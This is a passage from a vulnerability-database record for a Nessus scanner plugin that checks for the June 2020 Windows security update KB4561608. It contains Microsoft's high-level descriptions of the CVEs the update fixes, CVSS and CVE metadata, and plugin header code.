An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. 
The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. 
An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. 
An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. 
The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. 
(CVE-2020-1244)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561608.NASL", 
"href": "https://www.tenable.com/plugins/nessus/137256", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137256);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n 
\"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561608\");\n script_xref(name:\"MSFT\", value:\"MS20-4561608\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. 
(CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. 
An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. 
(CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. 
An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. 
The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. 
An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
